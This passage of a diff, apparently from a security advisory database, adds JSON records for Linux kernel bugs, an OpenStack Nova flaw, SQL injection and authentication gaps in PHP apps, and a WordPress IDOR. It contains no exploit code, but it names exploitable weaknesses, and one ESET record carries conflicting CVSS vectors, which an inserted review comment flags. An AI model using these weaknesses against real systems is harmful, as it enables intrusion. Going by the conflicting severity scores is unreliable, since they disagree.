+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: server: fix leak of active_num_conn in ksmbd_tcp_new_connection()\n\nOn kthread_run() failure in ksmbd_tcp_new_connection(), the transport is\nfreed via free_transport(), which does not decrement active_num_conn,\nleaking this counter.\n\nReplace free_transport() with ksmbd_tcp_disconnect().",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23228"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/599271110c35f6b16e2e4e45b9fbd47ed378c982"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/787769c8cc50416af7b8b1a36e6bcd6aaa7680aa"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/baf664fc90a6139a39a58333e4aaa390c10d45dc"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/cd25e0d809531a67e9dd53b19012d27d2b13425f"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T16:22:32Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json b/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json
new file mode 100644
index 0000000000000..edaeeda4887fe
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json
@@ -0,0 +1,41 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-j87r-wgfm-7fjj",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2026-23229"
+ ],
+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: virtio - Add spinlock protection with virtqueue notification\n\nWhen VM boots with one virtio-crypto PCI device and builtin backend,\nrun openssl benchmark command with multiple processes, such as\n openssl speed -evp aes-128-cbc -engine afalg -seconds 10 -multi 32\n\nopenssl processes will hangup and there is error reported like this:\n virtio_crypto virtio0: dataq.0:id 3 is not a head!\n\nIt seems that the data virtqueue need protection when it is handled\nfor virtio done notification. If the spinlock protection is added\nin virtcrypto_done_task(), openssl benchmark with multiple processes\nworks well.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23229"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/49c57c6c108931a914ed94e3c0ddb974008260a3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/c0a0ded3bb7fd45f720faa48449a930153257d3a"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/d6f0d586808689963e58fd739bed626ff5013b24"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/e69a7b0a71b6561b3b6459f1fded8d589f2e8ac2"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T16:22:32Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-jggw-c47g-3w3q/GHSA-jggw-c47g-3w3q.json b/advisories/unreviewed/2026/02/GHSA-jggw-c47g-3w3q/GHSA-jggw-c47g-3w3q.json
index 8de01d65798ed..99b4c77dd87af 100644
--- a/advisories/unreviewed/2026/02/GHSA-jggw-c47g-3w3q/GHSA-jggw-c47g-3w3q.json
+++ b/advisories/unreviewed/2026/02/GHSA-jggw-c47g-3w3q/GHSA-jggw-c47g-3w3q.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-jggw-c47g-3w3q",
- "modified": "2026-02-05T18:30:32Z",
+ "modified": "2026-02-18T18:30:23Z",
 "published": "2026-02-05T18:30:32Z",
 "aliases": [
 "CVE-2026-0714"
 ],
 "details": "A physical attack vulnerability exists in certain Moxa industrial computers using TPM-backed LUKS full-disk encryption on Moxa Industrial Linux 3, where the discrete TPM is connected to the CPU via an SPI bus. Exploitation requires invasive physical access, including opening the device and attaching external equipment to the SPI bus to capture TPM communications. If successful, the captured data may allow offline decryption of eMMC contents. This attack cannot be performed through brief or opportunistic physical access and requires extended physical access, possession of the device, appropriate equipment, and sufficient time for signal capture and analysis. Remote exploitation is not possible.",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
diff --git a/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json b/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json
new file mode 100644
index 0000000000000..73ff26837c6b7
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jp99-8xc8-367m",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2026-23221"
+ ],
+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbus: fsl-mc: fix use-after-free in driver_override_show()\n\nThe driver_override_show() function reads the driver_override string\nwithout holding the device_lock. However, driver_override_store() uses\ndriver_set_override(), which modifies and frees the string while holding\nthe device_lock.\n\nThis can result in a concurrent use-after-free if the string is freed\nby the store function while being read by the show function.\n\nFix this by holding the device_lock around the read operation.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23221"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/1d6bd6183e723a7b256ff34bbb5b498b5f4f2ec0"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/a2ae33e1c6361e960a4d00f7cf75d880b54f9528"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T16:22:31Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json b/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json
new file mode 100644
index 0000000000000..029b80444b10b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json
@@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m34c-wrf8-mw69", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71237" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: Fix potential block overflow that cause system hang\n\nWhen a user executes the FITRIM command, an underflow can occur when\ncalculating nblocks if end_block is too small. Since nblocks is of\ntype sector_t, which is u64, a negative nblocks value will become a\nvery large positive integer. This ultimately leads to the block layer\nfunction __blkdev_issue_discard() taking an excessively long time to\nprocess the bio chain, and the ns_segctor_sem lock remains held for a\nlong period. This prevents other tasks from acquiring the ns_segctor_sem\nlock, resulting in the hang reported by syzbot in [1].\n\nIf the ending block is too small, typically if it is smaller than 4KiB\nrange, depending on the usage of the segment 0, it may be possible to\nattempt a discard request beyond the device size causing the hang.\n\nExiting successfully and assign the discarded size (0 in this case)\nto range->len.\n\nAlthough the start and len values in the user input range are too small,\na conservative strategy is adopted here to safely ignore them, which is\nequivalent to a no-op; it will not perform any trimming and will not\nthrow an error.\n\n[1]\ntask:segctord state:D stack:28968 pid:6093 tgid:6093 ppid:2 task_flags:0x200040 flags:0x00080000\nCall Trace:\n rwbase_write_lock+0x3dd/0x750 kernel/locking/rwbase_rt.c:272\n nilfs_transaction_lock+0x253/0x4c0 fs/nilfs2/segment.c:357\n nilfs_segctor_thread_construct fs/nilfs2/segment.c:2569 [inline]\n nilfs_segctor_thread+0x6ec/0xe00 fs/nilfs2/segment.c:2684\n\n[ryusuke: corrected part of the commit message about the consequences]", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2025-71237" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4aa45f841413cca81882602b4042c53502f34cad" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b8c5ee234bd54f1447c846101fdaef2cf70c2149" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/df1e20796c9f3d541cca47fb72e4369ea135642d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ea2278657ad0d62596589fbe2caf995e189e65e7" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json b/advisories/unreviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json new file mode 100644 index 0000000000000..f89bc387274d7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json 
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-m4f3-qp2w-gwh6",
+ "modified": "2026-02-18T18:30:41Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2026-24708"
+ ],
+ "details": "An issue was discovered in OpenStack Nova before 30.2.2, 31 before 31.2.1, and 32 before 32.1.1. By writing a malicious QCOW header to a root or ephemeral disk and then triggering a resize, a user may convince Nova's Flat image backend to call qemu-img without a format restriction, resulting in an unsafe image resize operation that could destroy data on the host system. Only compute nodes using the Flat image backend (usually configured with use_cow_images=False) are affected.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24708"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugs.launchpad.net/nova/+bug/2137507"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.openwall.com/lists/oss-security/2026/02/17/7"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-669"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T18:24:33Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json b/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json
new file mode 100644
index 0000000000000..6013449d93966
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-m4v3-95xp-3j5h",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2025-70147"
+ ],
+ "details": "Missing authentication in /admin/student.php and /admin/teacher.php in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to obtain sensitive information (including plaintext password field values) via direct HTTP GET requests to these endpoints without a valid session.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70147"
+ },
+ {
+ "type": "WEB",
+ "url": "https://projectworlds.com/online-time-table-generator-php-mysql"
+ },
+ {
+ "type": "WEB",
+ "url": "https://youngkevinn.github.io/posts/CVE-2025-70147-OTTTG-Info-Disclosure"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T17:21:36Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mc8x-4j6m-qj3r/GHSA-mc8x-4j6m-qj3r.json b/advisories/unreviewed/2026/02/GHSA-mc8x-4j6m-qj3r/GHSA-mc8x-4j6m-qj3r.json
index df6640dd80d20..c454d322223a0 100644
--- a/advisories/unreviewed/2026/02/GHSA-mc8x-4j6m-qj3r/GHSA-mc8x-4j6m-qj3r.json
+++ b/advisories/unreviewed/2026/02/GHSA-mc8x-4j6m-qj3r/GHSA-mc8x-4j6m-qj3r.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mc8x-4j6m-qj3r",
- "modified": "2026-02-06T15:31:02Z",
+ "modified": "2026-02-18T18:30:23Z",
 "published": "2026-02-06T15:31:02Z",
 "aliases": [
 "CVE-2025-13818"
 ],
 "details": "Local privilege escalation vulnerability via insecure temporary batch file execution in ESET Management Agent",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
diff --git a/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json b/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json
new file mode 100644
index 0000000000000..ea6059e047666
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json
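Review bot: The CVSS v3.1 vector added for GHSA-mc8x-4j6m-qj3r ends in `A:H`, while the CVSS v4.0 vector kept as context in the same `severity` array has `VA:N`, so the two entries disagree on availability impact. A consumer that scores from one vector or the other will rank this advisory differently; the record should be reconciled against the vendor advisory, and if the v4 vector is the authoritative one the added line would read `"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"`. The `severity` array continues past the end of the hunk.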
@@ -0,0 +1,37 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mx4x-pxgm-r77w",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2025-71231"
+ ],
+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: iaa - Fix out-of-bounds index in find_empty_iaa_compression_mode\n\nThe local variable 'i' is initialized with -EINVAL, but the for loop\nimmediately overwrites it and -EINVAL is never returned.\n\nIf no empty compression mode can be found, the function would return the\nout-of-bounds index IAA_COMP_MODES_MAX, which would cause an invalid\narray access in add_iaa_compression_mode().\n\nFix both issues by returning either a valid index or -EINVAL.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71231"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/c77b33b58512708bd5603f48465f018c8b748847"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/d75207465eed20bc9b0daa4a0927de9568996067"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/de16f5bca05cace238d237791ed1b6e9d22dab60"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T16:22:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json b/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json
new file mode 100644
index 0000000000000..f43c4e522439a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json
@@ -0,0 +1,29 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p525-h9pq-233r",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2026-23225"
+ ],
+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsched/mmcid: Don't assume CID is CPU owned on mode switch\n\nShinichiro reported a KASAN UAF, which is actually an out of bounds access\nin the MMCID management code.\n\n CPU0\t\t\t\t\t\tCPU1\n \t\t\t\t\t\tT1 runs in userspace\n T0: fork(T4) -> Switch to per CPU CID mode\n fixup() set MM_CID_TRANSIT on T1/CPU1\n T4 exit()\n T3 exit()\n T2 exit()\n\t\t\t\t\t\tT1 exit() switch to per task mode\n\t\t\t\t\t\t ---> Out of bounds access.\n\nAs T1 has not scheduled after T0 set the TRANSIT bit, it exits with the\nTRANSIT bit set. sched_mm_cid_remove_user() clears the TRANSIT bit in\nthe task and drops the CID, but it does not touch the per CPU storage.\nThat's functionally correct because a CID is only owned by the CPU when\nthe ONCPU bit is set, which is mutually exclusive with the TRANSIT flag.\n\nNow sched_mm_cid_exit() assumes that the CID is CPU owned because the\nprior mode was per CPU. It invokes mm_drop_cid_on_cpu() which clears the\nnot set ONCPU bit and then invokes clear_bit() with an insanely large\nbit number because TRANSIT is set (bit 29).\n\nPrevent that by actually validating that the CID is CPU owned in\nmm_drop_cid_on_cpu().",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23225"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/81f29975631db8a78651b3140ecd0f88ffafc476"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T16:22:32Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json b/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json
new file mode 100644
index 0000000000000..cd62b1ccfc1e7
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json
@@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p68h-c56f-p3v6", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23230" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: split cached_fid bitfields to avoid shared-byte RMW races\n\nis_open, has_lease and on_list are stored in the same bitfield byte in\nstruct cached_fid but are updated in different code paths that may run\nconcurrently. Bitfield assignments generate byte read–modify–write\noperations (e.g. `orb $mask, addr` on x86_64), so updating one flag can\nrestore stale values of the others.\n\nA possible interleaving is:\n CPU1: load old byte (has_lease=1, on_list=1)\n CPU2: clear both flags (store 0)\n CPU1: RMW store (old | IS_OPEN) -> reintroduces cleared bits\n\nTo avoid this class of races, convert these flags to separate bool\nfields.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23230" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3eaa22d688311c708b73f3c68bc6d0c8e3f0f77a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4386f6af8aaedd0c5ad6f659b40cadcc8f423828" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4cfa4c37dcbcfd70866e856200ed8a2894cac578" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c4b9edd55987384a1f201d3d07ff71e448d79c1b" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json b/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json index 347a03450b14b..bc18a59fea38a 100644 
--- a/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json
+++ b/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json
@@ -45,7 +45,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-119"
+ ],
 "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json
new file mode 100644
index 0000000000000..e88b5b1de3963
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-v3v9-r7ff-976x",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2025-70149"
+ ],
+ "details": "CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in print_membership_card.php via the ID parameter.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70149"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.phpscriptsonline.com/product/membership-management-software"
+ },
+ {
+ "type": "WEB",
+ "url": "https://youngkevinn.github.io/posts/CVE-2025-70149-Membership-SQLi"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T17:21:36Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json b/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json
index 4d5790a195744..b47498da8485d 100644
--- a/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json
+++ b/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json
@@ -29,7 +29,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-285"
+ ],
 "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json b/advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json
new file mode 100644
index 0000000000000..d0fa6dd3ed933
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w35p-gjc5-2g6r",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2026-2230"
+ ],
+ "details": "The Booking Calendar plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 10.14.14 via the handle_ajax_save function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, and booking permissions granted by an Administrator, to modify other users' plugin settings, such as booking calendar display options, which can disrupt the booking calendar functionality for the targeted user.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2230"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/booking/trunk/includes/save-user-meta/save-user-meta.php#L90"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3456856"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/60f7df44-22f9-4a9e-a20c-4b8628674079?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-639"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T17:21:36Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json b/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json
new file mode 100644
index 0000000000000..940a4d6d2b01d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json
@@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w94g-pmcx-r454", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-71229" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: Fix alignment fault in rtw_core_enable_beacon()\n\nrtw_core_enable_beacon() reads 4 bytes from an address that is not a\nmultiple of 4. This results in a crash on some systems.\n\nDo 1 byte reads/writes instead.\n\nUnable to handle kernel paging request at virtual address ffff8000827e0522\nMem abort info:\n ESR = 0x0000000096000021\n EC = 0x25: DABT (current EL), IL = 32 bits\n SET = 0, FnV = 0\n EA = 0, S1PTW = 0\n FSC = 0x21: alignment fault\nData abort info:\n ISV = 0, ISS = 0x00000021, ISS2 = 0x00000000\n CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\nswapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000005492000\n[ffff8000827e0522] pgd=0000000000000000, p4d=10000001021d9403, pud=10000001021da403, pmd=100000011061c403, pte=00780000f3200f13\nInternal error: Oops: 0000000096000021 [#1] SMP\nModules linked in: [...] 
rtw88_8822ce rtw88_8822c rtw88_pci rtw88_core [...]\nCPU: 0 UID: 0 PID: 73 Comm: kworker/u32:2 Tainted: G W 6.17.9 #1-NixOS VOLUNTARY\nTainted: [W]=WARN\nHardware name: FriendlyElec NanoPC-T6 LTS (DT)\nWorkqueue: phy0 rtw_c2h_work [rtw88_core]\npstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : rtw_pci_read32+0x18/0x40 [rtw88_pci]\nlr : rtw_core_enable_beacon+0xe0/0x148 [rtw88_core]\nsp : ffff800080cc3ca0\nx29: ffff800080cc3ca0 x28: ffff0001031fc240 x27: ffff000102100828\nx26: ffffd2cb7c9b4088 x25: ffff0001031fc2c0 x24: ffff000112fdef00\nx23: ffff000112fdef18 x22: ffff000111c29970 x21: 0000000000000001\nx20: 0000000000000001 x19: ffff000111c22040 x18: 0000000000000000\nx17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\nx14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000\nx11: 0000000000000000 x10: 0000000000000000 x9 : ffffd2cb6507c090\nx8 : 0000000000000000 x7 : 0000000000000000 x6 : 0000000000000000\nx5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000\nx2 : 0000000000007f10 x1 : 0000000000000522 x0 : ffff8000827e0522\nCall trace:\n rtw_pci_read32+0x18/0x40 [rtw88_pci] (P)\n rtw_hw_scan_chan_switch+0x124/0x1a8 [rtw88_core]\n rtw_fw_c2h_cmd_handle+0x254/0x290 [rtw88_core]\n rtw_c2h_work+0x50/0x98 [rtw88_core]\n process_one_work+0x178/0x3f8\n worker_thread+0x208/0x418\n kthread+0x120/0x220\n ret_from_fork+0x10/0x20\nCode: d28fe202 8b020000 f9524400 8b214000 (b9400000)\n---[ end trace 0000000000000000 ]---", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71229" + }, 